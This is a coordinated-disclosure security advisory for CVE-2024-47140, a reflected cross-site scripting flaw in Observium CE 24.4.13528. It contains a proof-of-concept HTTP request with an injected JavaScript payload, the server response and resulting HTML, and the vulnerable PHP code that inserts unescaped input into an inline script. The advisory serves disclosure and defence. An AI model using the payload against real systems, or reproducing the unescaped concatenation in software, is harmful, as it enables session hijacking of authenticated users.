CVE-2024-47140
A cross-site scripting (xss) vulnerability exists in the add_alert_check page of Observium CE 24.4.13528. A specially crafted HTTP request can lead to a arbitrary javascript code execution. An authenticated user would need to click a malicious link provided by the attacker.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Observium CE 24.4.13528
Observium - https://www.observium.org/
8.7 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
Observium is a web-based network monitoring platform designed for network performance monitoring, infrastructure health management, and alerting. It provides automatic discovery of network devices, and supports a wide range of hardware and software platforms, including routers, switches, servers, and applications.
A reflected cross-site scripting vulnerability exists in add_alert_check functionality where setting a proper value of entity_type parameter an attacker is able to inject an arbitrary java script code into web page body.
To trigger this vulnerability an attacker needs to force victim’s browsers to send the following http request:
GET /add_alert_check/entity_type=a'+alert(123)+'a HTTP/1.1
Host: 192.168.0.40
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: wmeditor=0%3A0%3A0; OBSID=aelurmf6111q4c057ekkj1efcv; observium_screen_ratio=1; observium_screen_resolution=2560x1440; screen_scheme=light
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Received response:
HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 13:17:29 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 99583
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Resulting HTML output:
<script>
$('#btn-save').on('click', function() {
var result = $('#rules-ROeHHM9f').queryBuilder('getRules');
var div = $('#output');
if (!$.isEmptyObject(result)) {
var formData = JSON.stringify({
action: 'alert_check_add',
alert_assoc: JSON.stringify(result),
entity_type: 'a'+alert(123)+'a',
In this example (it is caused by the place where our injected code lands and the code we injected) victim needs to additionaly click Add Checker button to trigger this XSS.
vulnerable code html/pages/add_alert_check.inc.php
<?php
$script
= "<script>
$('#btn-save').on('click', function() {
var result = $('#" . $form_id . "').queryBuilder('getRules');
var div = $('#output');
if (!$.isEmptyObject(result)) {
var formData = JSON.stringify({
action: 'alert_check_add',
alert_assoc: JSON.stringify(result),
entity_type: '" . $vars['entity_type'] . "',
By clicking the malicious link, injected javascript code would execute in the context of authenticated user.
2024-10-23 - Initial Vendor Contact
2024-10-23 - Vendor Disclosure
2024-12-24 - Vendor Patch Release
2025-01-15 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.